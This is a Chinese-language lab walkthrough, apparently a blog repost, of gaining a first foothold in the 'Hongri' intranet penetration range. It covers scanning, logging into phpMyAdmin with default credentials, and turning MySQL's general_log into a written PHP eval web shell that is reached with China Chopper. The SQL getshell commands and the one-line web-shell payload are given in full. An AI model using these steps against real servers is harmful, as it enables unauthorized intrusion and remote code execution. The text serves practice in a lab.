红日靶场(内网渗透)——1
作者:互联网
1.靶机信息。
win7 x64:ip:192.168.248.129
2008: ip:192.168.138
win2k3:192.168.52.141
攻击机信息:
kali:集成各种攻击工具 ip:192.168.248.128
win10:主要进行数据整理。
2.信息搜集。
1)使用kali扫描靶机
netdiscover -r 靶机IP网段
发现win7外网网址为:192.168.248.129
对192.168.248.129进行端口扫描。
发现开放端口80及3306.
确定使用HTTP和MYSQL服务。确定思路,使用SQL注入进行提权。
2)网站信息搜集
对网目录进行扫描,发现phpmyadmin页面:
同时发现网站页面底部有mysql的连接测试检测:
尝试root/root,连接成功:
利用之前得到的信息,直接登录phpmyadmin,直接对mysql进行管理:
3)利用sql进行getshell
利用步骤:
1.利用日志文件。
开启日志记录以及日志保存目录
SHOW VARIABLES LIKE '%general_log%'
SET GLOBAL general_log = "ON"
将日志文件保存为php文件
SET GLOBAL general_log_file="C:/phpStudy/www/1.php"
2.利用一句话马
执行一句话马
SELECT '<?php eval($_POST["cmd"]);?>';
利用菜刀进行连接:
发现beifen.rar,应该为网站源码,下载查看。
打开/yxcms/index.php,发现用户名admin和密码123456:
登录,发现可以进行前台模板管理,注入一句话马:
通过beifen.rar确定路径后,菜刀连接,至此win7权限已经获取完毕。之后进行内网渗透,请见下一篇文章。
标签:红日,248.129,渗透,ip,win7,192.168,general,靶场,日志 来源: https://www.cnblogs.com/yaolingyu/p/16260320.html